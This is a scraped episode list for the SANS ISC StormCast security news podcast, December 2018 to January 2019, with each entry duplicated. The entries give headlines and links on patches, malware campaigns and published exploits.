MSFT Skype/Team Foundation Server Patches https://isc.sans.edu/forums/diary/Microsoft+Publishes+Patches+for+Skype+for+Business+and+Team+Foundation+Server/24540/ SCP Client Vulnerabilities https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt Server Hosting Companies Trivilally Hacked https://www.websiteplanet.com/blog/report-popular-hosting-hacked/ Vulnerabilities in Industrial Remote Controls https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/attacks-against-industrial-machines-via-vulnerable-radio-remote-controllers-security-analysis-and-recommendations Oracle Quarterly Critical Patch Update https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
1/16/20196 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, January 16th 2019

MSFT Skype/Team Foundation Server Patches https://isc.sans.edu/forums/diary/Microsoft+Publishes+Patches+for+Skype+for+Business+and+Team+Foundation+Server/24540/ SCP Client Vulnerabilities https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt Server Hosting Companies Trivilally Hacked https://www.websiteplanet.com/blog/report-popular-hosting-hacked/ Vulnerabilities in Industrial Remote Controls https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/attacks-against-industrial-machines-via-vulnerable-radio-remote-controllers-security-analysis-and-recommendations Oracle Quarterly Critical Patch Update https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
1/16/20196 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, January 15th 2019

Microsoft LAPS - Blue Team / Red Team https://isc.sans.edu/forums/diary/Microsoft+LAPS+Blue+Team+Red+Team/24528/ Intel SGX Platform Update https://www.intel.com/content/www/us/en/security-center/advisory/INTEL-SA-00203.html Godaddy Injecting JavaScript https://www.igorkromin.net/index.php/2019/01/13/godaddy-is-sneakily-injecting-javascript-into-your-website-and-how-to-stop-it/ Play with Docker Vulnerability https://www.cyberark.com/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host/
1/14/20195 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, January 15th 2019

Microsoft LAPS - Blue Team / Red Team https://isc.sans.edu/forums/diary/Microsoft+LAPS+Blue+Team+Red+Team/24528/ Intel SGX Platform Update https://www.intel.com/content/www/us/en/security-center/advisory/INTEL-SA-00203.html Godaddy Injecting JavaScript https://www.igorkromin.net/index.php/2019/01/13/godaddy-is-sneakily-injecting-javascript-into-your-website-and-how-to-stop-it/ Play with Docker Vulnerability https://www.cyberark.com/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host/
1/14/20195 minutes, 59 seconds
Episode Artwork

ISC StormCast for Monday, January 14th 2019

Government Website TLS Certificates Expire due to Partial Shutdown https://news.netcraft.com/archives/2019/01/10/gov-security-falters-during-u-s-shutdown.html Firefox EOL Plan for Flash https://bugzilla.mozilla.org/show_bug.cgi?id=1519434 Fake Movie File Malware https://www.bleepingcomputer.com/news/security/fake-movie-file-infects-pc-to-steal-cryptocurrency-poison-google-results/ Microsoft Windows Patch Breaks Access 97 https://borncity.com/win/2019/01/11/windows-january-2019-updates-breaks-access-to-access-dbs/ Snorpy Assists in Snort Rule Writing https://isc.sans.edu/forums/diary/Snorpy+a+Web+Base+Tool+to+Build+SnortSuricata+Rules/24522/ Packet Challenge
1/14/20195 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, January 14th 2019

Government Website TLS Certificates Expire due to Partial Shutdown https://news.netcraft.com/archives/2019/01/10/gov-security-falters-during-u-s-shutdown.html Firefox EOL Plan for Flash https://bugzilla.mozilla.org/show_bug.cgi?id=1519434 Fake Movie File Malware https://www.bleepingcomputer.com/news/security/fake-movie-file-infects-pc-to-steal-cryptocurrency-poison-google-results/ Microsoft Windows Patch Breaks Access 97 https://borncity.com/win/2019/01/11/windows-january-2019-updates-breaks-access-to-access-dbs/ Snorpy Assists in Snort Rule Writing https://isc.sans.edu/forums/diary/Snorpy+a+Web+Base+Tool+to+Build+SnortSuricata+Rules/24522/ Packet Challenge
1/14/20195 minutes, 51 seconds
Episode Artwork

ISC StormCast for Friday, January 11th 2019

Old Tricks still work: I love you Malspam https://isc.sans.edu/forums/diary/Heartbreaking+Emails+Love+You+Malspam/24512/ Juniper Updates Released https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10916&cat=SIRT_1&actp=LIST https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10918&cat=SIRT_1&actp=LIST New Systemd/Journald Exploit Release https://www.qualys.com/2019/01/09/system-down/system-down.txt Global DNS Hijacking https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
1/11/20195 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, January 11th 2019

Old Tricks still work: I love you Malspam https://isc.sans.edu/forums/diary/Heartbreaking+Emails+Love+You+Malspam/24512/ Juniper Updates Released https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10916&cat=SIRT_1&actp=LIST https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10918&cat=SIRT_1&actp=LIST New Systemd/Journald Exploit Release https://www.qualys.com/2019/01/09/system-down/system-down.txt Global DNS Hijacking https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
1/11/20195 minutes, 41 seconds
Episode Artwork

ISC StormCast for Thursday, January 10th 2019

Simple Mechanism for Creating Certificates https://blog.filippo.io/mkcert-valid-https-certificates-for-localhost/ Review of Smartphone Face Recognition https://www.consumentenbond.nl/veilig-internetten/gezichtsherkenning-te-hacken Google Public DNS now supports DNS-over-TLS https://security.googleblog.com/2019/01/google-public-dns-now-supports-dns-over.html Malwarebytes Freezes Windows 7 https://forums.malwarebytes.com/topic/241223-malwarebytes-for-windows-and-windows-7-freezelock-up/ German Police Looking for MAC Address https://polizei.brandenburg.de/pressemeldung/f8-e0-79-af-57-eb-cyber-fahndung-nach-ma/1310909
1/10/20195 minutes, 54 seconds
Episode Artwork

ISC StormCast for Thursday, January 10th 2019

Simple Mechanism for Creating Certificates https://blog.filippo.io/mkcert-valid-https-certificates-for-localhost/ Review of Smartphone Face Recognition https://www.consumentenbond.nl/veilig-internetten/gezichtsherkenning-te-hacken Google Public DNS now supports DNS-over-TLS https://security.googleblog.com/2019/01/google-public-dns-now-supports-dns-over.html Malwarebytes Freezes Windows 7 https://forums.malwarebytes.com/topic/241223-malwarebytes-for-windows-and-windows-7-freezelock-up/ German Police Looking for MAC Address https://polizei.brandenburg.de/pressemeldung/f8-e0-79-af-57-eb-cyber-fahndung-nach-ma/1310909
1/10/20195 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, January 9th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+January+2019+Patch+Tuesday/24504/ https://patchtuesdaydashboard.com/ Adobe Updates https://helpx.adobe.com/security.html Google Play Store Adware https://blog.trendmicro.com/trendlabs-security-intelligence/adware-disguised-as-game-tv-remote-control-apps-infect-9-million-google-play-users/ Ethereum Classic 51% Attack https://blog.coinbase.com/ethereum-classic-etc-is-currently-being-51-attacked-33be13ce32de
1/9/20195 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, January 9th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+January+2019+Patch+Tuesday/24504/ https://patchtuesdaydashboard.com/ Adobe Updates https://helpx.adobe.com/security.html Google Play Store Adware https://blog.trendmicro.com/trendlabs-security-intelligence/adware-disguised-as-game-tv-remote-control-apps-infect-9-million-google-play-users/ Ethereum Classic 51% Attack https://blog.coinbase.com/ethereum-classic-etc-is-currently-being-51-attacked-33be13ce32de
1/9/20195 minutes, 48 seconds
Episode Artwork

ISC StormCast for Tuesday, January 8th 2019

Malware of the Day: Encrypted Word Document https://isc.sans.edu/forums/diary/Analyzing+Encrypted+Malicious+Office+Documents/24498/ Apple iOS Apps Reaching Out to Malware Server https://www.wandera.com/risky-apps/ NCSC Offers Assistance Against Attacks from Foreign Governments https://www.dni.gov/index.php/ncsc-how-we-work/ncsc-know-the-risk-raise-your-shield/ncsc-awareness-materials Hardware Agnostic Side Channel Attacks https://arxiv.org/abs/1901.01161
1/8/20197 minutes, 2 seconds
Episode Artwork

ISC StormCast for Tuesday, January 8th 2019

Malware of the Day: Encrypted Word Document https://isc.sans.edu/forums/diary/Analyzing+Encrypted+Malicious+Office+Documents/24498/ Apple iOS Apps Reaching Out to Malware Server https://www.wandera.com/risky-apps/ NCSC Offers Assistance Against Attacks from Foreign Governments https://www.dni.gov/index.php/ncsc-how-we-work/ncsc-know-the-risk-raise-your-shield/ncsc-awareness-materials Hardware Agnostic Side Channel Attacks https://arxiv.org/abs/1901.01161
1/8/20197 minutes, 2 seconds
Episode Artwork

ISC StormCast for Monday, January 7th 2019

Malware in TAR Files https://isc.sans.edu/forums/diary/Malicious+tar+Attachments/24496/ ReiKey MacOS Keystoke Logger Detector https://objective-see.com/products/reikey.html Phishing Tool Kit uses Simple Substituion Fonts https://www.proofpoint.com/us/threat-insight/post/phishing-template-uses-fake-fonts-decode-content-and-evade-detection
1/7/20196 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, January 7th 2019

Malware in TAR Files https://isc.sans.edu/forums/diary/Malicious+tar+Attachments/24496/ ReiKey MacOS Keystoke Logger Detector https://objective-see.com/products/reikey.html Phishing Tool Kit uses Simple Substituion Fonts https://www.proofpoint.com/us/threat-insight/post/phishing-template-uses-fake-fonts-decode-content-and-evade-detection
1/7/20196 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, January 4th 2019

Malware Leaks Victim Data via FTP https://isc.sans.edu/forums/diary/Malicious+Script+Leaking+Data+via+FTP/24484/ Hijacking Dormant Twitter Accounts https://techcrunch.com/2019/01/02/hackers-islamic-state-propaganda-twitter/ Android Authentication Bypass via Skype https://www.youtube.com/watch?v=EiEcwOfTFqI Critical Adobe Updates https://helpx.adobe.com/security/products/acrobat/apsb19-02.html FilesLocker Ransomware Master Key Published https://www.bleepingcomputer.com/news/security/master-decryption-key-released-for-fileslocker-ransomware/
1/4/20196 minutes, 7 seconds
Episode Artwork

ISC StormCast for Friday, January 4th 2019

Malware Leaks Victim Data via FTP https://isc.sans.edu/forums/diary/Malicious+Script+Leaking+Data+via+FTP/24484/ Hijacking Dormant Twitter Accounts https://techcrunch.com/2019/01/02/hackers-islamic-state-propaganda-twitter/ Android Authentication Bypass via Skype https://www.youtube.com/watch?v=EiEcwOfTFqI Critical Adobe Updates https://helpx.adobe.com/security/products/acrobat/apsb19-02.html FilesLocker Ransomware Master Key Published https://www.bleepingcomputer.com/news/security/master-decryption-key-released-for-fileslocker-ransomware/
1/4/20196 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, January 3rd 2019

Gift Card Scams https://isc.sans.edu/forums/diary/Gift+Card+Scams+on+the+rise/24482/ WiFi Chipset Exploit https://2018.zeronights.ru/wp-content/uploads/materials/19-Researching-Marvell-Avastar-Wi-Fi.pdf?fbclid=IwAR07FmZGKLKdJAKI4g0o-Wm-dLGwclV8Hhi-L4_HRlklldY8UC6WY72AdAw
1/3/20195 minutes, 51 seconds
Episode Artwork

ISC StormCast for Thursday, January 3rd 2019

Gift Card Scams https://isc.sans.edu/forums/diary/Gift+Card+Scams+on+the+rise/24482/ WiFi Chipset Exploit https://2018.zeronights.ru/wp-content/uploads/materials/19-Researching-Marvell-Avastar-Wi-Fi.pdf?fbclid=IwAR07FmZGKLKdJAKI4g0o-Wm-dLGwclV8Hhi-L4_HRlklldY8UC6WY72AdAw
1/3/20195 minutes, 51 seconds
Episode Artwork

ISC StormCast for Wednesday, January 2nd 2019

Bypassing Vein Scanner Authentication (in german) https://media.ccc.de/v/35c3-9545-venenerkennung_hacken Hacking Smart Lightbulbs and Firmware Exploits https://media.ccc.de/v/35c3-9723-smart_home_-_smart_hack European Union Offers Bug Bounty for Open Source Software https://juliareda.eu/fossa/ Bypassing Google ReCaptcha https://github.com/ecthros/uncaptcha2
1/2/20197 minutes, 15 seconds
Episode Artwork

ISC StormCast for Wednesday, January 2nd 2019

Bypassing Vein Scanner Authentication (in german) https://media.ccc.de/v/35c3-9545-venenerkennung_hacken Hacking Smart Lightbulbs and Firmware Exploits https://media.ccc.de/v/35c3-9723-smart_home_-_smart_hack European Union Offers Bug Bounty for Open Source Software https://juliareda.eu/fossa/ Bypassing Google ReCaptcha https://github.com/ecthros/uncaptcha2
1/2/20197 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, December 28th 2018

Phishing Attack Uses IP Counter https://isc.sans.edu/forums/diary/Matryoshka+Phish/24460/ JungleSec Ransomware Attacks via IPMI https://www.bleepingcomputer.com/news/security/junglesec-ransomware-infects-victims-through-ipmi-remote-consoles/ Microsoft Edge PoC RCE Exploit https://github.com/phoenhex/files/blob/master/pocs/cve-2018-8629-chakra.js
12/28/20186 minutes, 4 seconds
Episode Artwork

ISC StormCast for Friday, December 28th 2018

Phishing Attack Uses IP Counter https://isc.sans.edu/forums/diary/Matryoshka+Phish/24460/ JungleSec Ransomware Attacks via IPMI https://www.bleepingcomputer.com/news/security/junglesec-ransomware-infects-victims-through-ipmi-remote-consoles/ Microsoft Edge PoC RCE Exploit https://github.com/phoenhex/files/blob/master/pocs/cve-2018-8629-chakra.js
12/28/20186 minutes, 4 seconds
Episode Artwork

ISC StormCast for Thursday, December 27th 2018

Problems with IE Emergency Patch https://support.microsoft.com/en-us/help/4483229/december192018kb4483229osbuild143932670 Bitcoin Blacklists https://isc.sans.edu/forums/diary/Bitcoin+Blacklists/24456/ D-Link DIR-816 A2 Stack Overflow https://github.com/RootSoull/Vuln-Poc/tree/master/D-Link/DIR-816
12/26/20182 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, December 27th 2018

Problems with IE Emergency Patch https://support.microsoft.com/en-us/help/4483229/december192018kb4483229osbuild143932670 Bitcoin Blacklists https://isc.sans.edu/forums/diary/Bitcoin+Blacklists/24456/ D-Link DIR-816 A2 Stack Overflow https://github.com/RootSoull/Vuln-Poc/tree/master/D-Link/DIR-816
12/26/20182 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, December 21st 2018

Windows 0-Day PoC Published: Arbitrary File Read as System https://sandboxescaper.blogspot.com/2018/12/readfile-0day.html Attacks Against 2FA in the Middle East https://www.amnesty.org/en/latest/research/2018/12/when-best-practice-is-not-good-enough/ FBI Shuts Down Booter Services http://www.documentcloud.org/documents/5648950-DOJ-indictments-in-booter-cases.html Intel VISA Undocumented Debug Feature https://www.blackhat.com/asia-19/briefings/schedule/index.html#intel-visa-through-the-rabbit-hole-13513
12/21/20185 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, December 21st 2018

Windows 0-Day PoC Published: Arbitrary File Read as System https://sandboxescaper.blogspot.com/2018/12/readfile-0day.html Attacks Against 2FA in the Middle East https://www.amnesty.org/en/latest/research/2018/12/when-best-practice-is-not-good-enough/ FBI Shuts Down Booter Services http://www.documentcloud.org/documents/5648950-DOJ-indictments-in-booter-cases.html Intel VISA Undocumented Debug Feature https://www.blackhat.com/asia-19/briefings/schedule/index.html#intel-visa-through-the-rabbit-hole-13513
12/21/20185 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, December 20th 2018

Microsoft Publishes Emergency Patch for Internet Explorer https://isc.sans.edu/forums/diary/Microsoft+OOB+Patch+for+Internet+Explorer+Scripting+Engine+Memory+Corruption+Vulnerability/24438/ Restricting PowerShell Capabilities with NetSh https://isc.sans.edu/forums/diary/Restricting+PowerShell+Capabilities+with+NetSh/24434/ Remotely Bricking a Server https://eclypsium.com/2018/12/19/remotely-bricking-a-server/
12/20/20184 minutes, 16 seconds
Episode Artwork

ISC StormCast for Thursday, December 20th 2018

Microsoft Publishes Emergency Patch for Internet Explorer https://isc.sans.edu/forums/diary/Microsoft+OOB+Patch+for+Internet+Explorer+Scripting+Engine+Memory+Corruption+Vulnerability/24438/ Restricting PowerShell Capabilities with NetSh https://isc.sans.edu/forums/diary/Restricting+PowerShell+Capabilities+with+NetSh/24434/ Remotely Bricking a Server https://eclypsium.com/2018/12/19/remotely-bricking-a-server/
12/20/20184 minutes, 16 seconds
Episode Artwork

ISC StormCast for Wednesday, December 19th 2018

ASUS Vulnerabilities https://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities GIGABYTE Vulnerabilities https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities Apple App Store Phishing https://www.bleepingcomputer.com/news/security/widespread-apple-id-phishing-attack-pretends-to-be-app-store-receipts Kibana Vulnerability Exploited https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/ Decrypter for InsaneCrypt and Everbe 1 https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-insanecrypt-or-everbe-1-family-of-ransomware/ http://id-ransomware.malwarehunterteam.com/ SANS Holiday Hack Challenge https://www.kringlecon.com
12/19/20185 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, December 19th 2018

ASUS Vulnerabilities https://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities GIGABYTE Vulnerabilities https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities Apple App Store Phishing https://www.bleepingcomputer.com/news/security/widespread-apple-id-phishing-attack-pretends-to-be-app-store-receipts Kibana Vulnerability Exploited https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/ Decrypter for InsaneCrypt and Everbe 1 https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-insanecrypt-or-everbe-1-family-of-ransomware/ http://id-ransomware.malwarehunterteam.com/ SANS Holiday Hack Challenge https://www.kringlecon.com
12/19/20185 minutes, 35 seconds
Episode Artwork

ISC StormCast for Tuesday, December 18th 2018

Password Protected ZIP with Maldoc https://isc.sans.edu/forums/diary/Password+Protected+ZIP+with+Maldoc/24426/ Memes Used as Covert Command and Control Channel https://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-use-malicious-memes-that-communicate-with-malware/ Shamoon Disk Whipper Malware is Back https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/
12/18/20185 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, December 18th 2018

Password Protected ZIP with Maldoc https://isc.sans.edu/forums/diary/Password+Protected+ZIP+with+Maldoc/24426/ Memes Used as Covert Command and Control Channel https://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-use-malicious-memes-that-communicate-with-malware/ Shamoon Disk Whipper Malware is Back https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/
12/18/20185 minutes, 23 seconds
Episode Artwork

ISC StormCast for Monday, December 17th 2018

Magellan Sqlite Vulnerability https://blade.tencent.com/magellan/index_en.html Logitech Options Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1663 Intel NUC BIOS Protection Flaw https://embedi.org/blog/nuclear-explotion/ HiddenTear Ransomware Decrypter https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-hiddentear-ransomware-with-ht-brute-forcer/
12/17/20184 minutes, 57 seconds
Episode Artwork

ISC StormCast for Monday, December 17th 2018

Magellan Sqlite Vulnerability https://blade.tencent.com/magellan/index_en.html Logitech Options Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1663 Intel NUC BIOS Protection Flaw https://embedi.org/blog/nuclear-explotion/ HiddenTear Ransomware Decrypter https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-hiddentear-ransomware-with-ht-brute-forcer/
12/17/20184 minutes, 57 seconds
Episode Artwork

ISC StormCast for Friday, December 14th 2018

Fake E-Mail Bomb Threats https://www.cnn.com/2018/12/13/us/email-bomb-threats/index.html Phishing Via Non-Delivery Notices https://isc.sans.edu/forums/diary/Phishing+Attack+Through+NonDelivery+Notification/24412/ LamePyre MacOS Malware https://blog.malwarebytes.com/detections/osx-lamepyre/
12/14/20186 minutes, 39 seconds
Episode Artwork

ISC StormCast for Friday, December 14th 2018

Fake E-Mail Bomb Threats https://www.cnn.com/2018/12/13/us/email-bomb-threats/index.html Phishing Via Non-Delivery Notices https://isc.sans.edu/forums/diary/Phishing+Attack+Through+NonDelivery+Notification/24412/ LamePyre MacOS Malware https://blog.malwarebytes.com/detections/osx-lamepyre/
12/14/20186 minutes, 39 seconds
Episode Artwork

ISC StormCast for Thursday, December 13th 2018

Yet Another DOSfuscation Sample https://isc.sans.edu/forums/diary/Yet+Another+DOSfuscation+Sample/24408/ OpenSSH Backdoors https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf Android Malware Bypasses 2FA For Paypal https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/
12/13/20184 minutes, 55 seconds
Episode Artwork

ISC StormCast for Thursday, December 13th 2018

Yet Another DOSfuscation Sample https://isc.sans.edu/forums/diary/Yet+Another+DOSfuscation+Sample/24408/ OpenSSH Backdoors https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf Android Malware Bypasses 2FA For Paypal https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/
12/13/20184 minutes, 55 seconds
Episode Artwork

ISC StormCast for Wednesday, December 12th 2018

Microsoft December 2018 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+December+2018+Patch+Tuesday/24404/ Adobe Patch Tuesday https://helpx.adobe.com/security/products/acrobat/apsb18-41.html Certificate Authority Weaknesses https://i.blackhat.com/eu-18/Thu-Dec-6/eu-18-Heftrig-Off-Path-Attacks-Against-PKI.pdf
12/12/20185 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, December 12th 2018

Microsoft December 2018 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+December+2018+Patch+Tuesday/24404/ Adobe Patch Tuesday https://helpx.adobe.com/security/products/acrobat/apsb18-41.html Certificate Authority Weaknesses https://i.blackhat.com/eu-18/Thu-Dec-6/eu-18-Heftrig-Off-Path-Attacks-Against-PKI.pdf
12/12/20185 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, December 11th 2018

Kubernetes Unauthenticated PoC Exploit for CVE-2018-1002105 https://github.com/evict/poc_CVE-2018-1002105#unauthenticated-poc WebAssembly Brings Buffer Overflows to Browsers https://www.forcepoint.com/blog/security-labs/new-whitepaper-memory-safety-old-vulnerabilities-become-new-webassembly Increased Ethereum Miner Attacks https://isc.sans.edu/port.html?port=8545 https://www.zdnet.com/article/hackers-ramp-up-attacks-on-mining-rigs-before-ethereum-price-crashes-into-the-gutter Android Click Fraud Apps are Emulating iPhones for Higher Revenue https://www.bleepingcomputer.com/news/security/android-clickfraud-op-impersonates-iphones-to-bump-ad-premiums/
12/11/20185 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, December 11th 2018

Kubernetes Unauthenticated PoC Exploit for CVE-2018-1002105 https://github.com/evict/poc_CVE-2018-1002105#unauthenticated-poc WebAssembly Brings Buffer Overflows to Browsers https://www.forcepoint.com/blog/security-labs/new-whitepaper-memory-safety-old-vulnerabilities-become-new-webassembly Increased Ethereum Miner Attacks https://isc.sans.edu/port.html?port=8545 https://www.zdnet.com/article/hackers-ramp-up-attacks-on-mining-rigs-before-ethereum-price-crashes-into-the-gutter Android Click Fraud Apps are Emulating iPhones for Higher Revenue https://www.bleepingcomputer.com/news/security/android-clickfraud-op-impersonates-iphones-to-bump-ad-premiums/
12/11/20185 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, December 10th 2018

Analyzing Malicious Docker Images https://isc.sans.edu/forums/diary/A+Dive+into+malicious+Docker+Containers/24388/ Arrest of Huawei CFO Inspires Advance Fee Scam https://isc.sans.edu/forums/diary/Arrest+of+Huawei+CFO+Inspires+Advance+Fee+Scam/24396/ Sextortion Messages Leading to Ransomware https://www.proofpoint.com/us/threat-insight/post/sextortion-side-ransomware WebKit Exploit Released https://github.com/LinusHenze/WebKit-RegEx-Exploit Implants Found in Russian Banks https://securelist.com/darkvishnya/89169/
12/10/20185 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, December 10th 2018

Analyzing Malicious Docker Images https://isc.sans.edu/forums/diary/A+Dive+into+malicious+Docker+Containers/24388/ Arrest of Huawei CFO Inspires Advance Fee Scam https://isc.sans.edu/forums/diary/Arrest+of+Huawei+CFO+Inspires+Advance+Fee+Scam/24396/ Sextortion Messages Leading to Ransomware https://www.proofpoint.com/us/threat-insight/post/sextortion-side-ransomware WebKit Exploit Released https://github.com/LinusHenze/WebKit-RegEx-Exploit Implants Found in Russian Banks https://securelist.com/darkvishnya/89169/
12/10/20185 minutes, 45 seconds
Episode Artwork

ISC StormCast for Friday, December 7th 2018

Adobe Vulnerability PoC Released https://isc.sans.edu/forums/diary/Is+it+Time+to+Uninstall+Flash+If+you+havent+already/24382/ WatchOS Update https://support.apple.com/en-us/HT209343 Data Exfiltration During Pentests https://isc.sans.edu/forums/diary/Data+Exfiltration+in+Penetration+Tests/24354/ PoC Exploit for Kubernetes Vulnerability https://github.com/evict/poc_CVE-2018-1002105 Preston Ackerman: Marketing 2FA https://www.sans.org/reading-room/whitepapers/authentication/swipe-tap-marketing-easier-2fa-increase-adoption-38695
12/7/201821 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, December 7th 2018

Adobe Vulnerability PoC Released https://isc.sans.edu/forums/diary/Is+it+Time+to+Uninstall+Flash+If+you+havent+already/24382/ WatchOS Update https://support.apple.com/en-us/HT209343 Data Exfiltration During Pentests https://isc.sans.edu/forums/diary/Data+Exfiltration+in+Penetration+Tests/24354/ PoC Exploit for Kubernetes Vulnerability https://github.com/evict/poc_CVE-2018-1002105 Preston Ackerman: Marketing 2FA https://www.sans.org/reading-room/whitepapers/authentication/swipe-tap-marketing-easier-2fa-increase-adoption-38695
12/7/201821 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, December 6th 2018

Adobe Releases Emergency Flash Patch https://helpx.adobe.com/security/products/flash-player/apsb18-42.html Apple Updates Everything (but not WatchOS) https://support.apple.com/en-us/HT201222 New Privacy Issues Affecting 3G-5G protocols https://eprint.iacr.org/2018/1175
12/6/20185 minutes, 6 seconds
Episode Artwork

ISC StormCast for Thursday, December 6th 2018

Adobe Releases Emergency Flash Patch https://helpx.adobe.com/security/products/flash-player/apsb18-42.html Apple Updates Everything (but not WatchOS) https://support.apple.com/en-us/HT201222 New Privacy Issues Affecting 3G-5G protocols https://eprint.iacr.org/2018/1175
12/6/20185 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, December 5th 2018

Fake Ransomware Decryption Service https://www.theregister.co.uk/2018/12/04/ransomware_helper_was_middleman_dr_shifro/ Latest Lokibot Malspam https://isc.sans.edu/forums/diary/Malspam+pushing+Lokibot+malware/24372/ Chrome 71 Released https://www.bleepingcomputer.com/news/google/chrome-71-released-with-abusive-ad-filtering-and-audio-blocking/ RSA Followup Webcast https://www.rsaconference.com/videos/virtual-session-the-5-most-dangerous-new-attack-techniques-and-whats-to-come
12/5/20186 minutes, 25 seconds
Episode Artwork

ISC StormCast for Wednesday, December 5th 2018

Fake Ransomware Decryption Service https://www.theregister.co.uk/2018/12/04/ransomware_helper_was_middleman_dr_shifro/ Latest Lokibot Malspam https://isc.sans.edu/forums/diary/Malspam+pushing+Lokibot+malware/24372/ Chrome 71 Released https://www.bleepingcomputer.com/news/google/chrome-71-released-with-abusive-ad-filtering-and-audio-blocking/ RSA Followup Webcast https://www.rsaconference.com/videos/virtual-session-the-5-most-dangerous-new-attack-techniques-and-whats-to-come
12/5/20186 minutes, 25 seconds
Episode Artwork

ISC StormCast for Tuesday, December 4th 2018

Word Maldoc: Yet Another Place to Hide a Command https://isc.sans.edu/forums/diary/Word+maldoc+yet+another+place+to+hide+a+command/24370/ US-Cert Releases SamSam Alerts https://www.us-cert.gov/ncas/alerts/AA18-337A Kubernetes Patches https://groups.google.com/forum/#!topic/kubernetes-announce/GVllWCg6L88 Malicious iOS App Tricks User in Payment https://www.welivesecurity.com/2018/12/03/scam-ios-apps-promise-fitness-steal-money-instead/
12/4/20184 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, December 4th 2018

Word Maldoc: Yet Another Place to Hide a Command https://isc.sans.edu/forums/diary/Word+maldoc+yet+another+place+to+hide+a+command/24370/ US-Cert Releases SamSam Alerts https://www.us-cert.gov/ncas/alerts/AA18-337A Kubernetes Patches https://groups.google.com/forum/#!topic/kubernetes-announce/GVllWCg6L88 Malicious iOS App Tricks User in Payment https://www.welivesecurity.com/2018/12/03/scam-ios-apps-promise-fitness-steal-money-instead/
12/4/20184 minutes, 54 seconds
Episode Artwork

ISC StormCast for Monday, December 3rd 2018

KingMiner Improved Cryptomining https://research.checkpoint.com/kingminer-the-new-and-improved-cryptojacker/ Siglent Technologies Oscilloscope Vulnerabilities https://seclists.org/fulldisclosure/2018/Nov/68 Autocad Malware https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft ISC Stickers (login required. first 10 requests each day) https://isc.sans.edu/sticker.html
12/3/20186 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, December 3rd 2018

KingMiner Improved Cryptomining https://research.checkpoint.com/kingminer-the-new-and-improved-cryptojacker/ Siglent Technologies Oscilloscope Vulnerabilities https://seclists.org/fulldisclosure/2018/Nov/68 Autocad Malware https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft ISC Stickers (login required. first 10 requests each day) https://isc.sans.edu/sticker.html
12/3/20186 minutes, 46 seconds
Episode Artwork

ISC StormCast for Friday, November 30th 2018

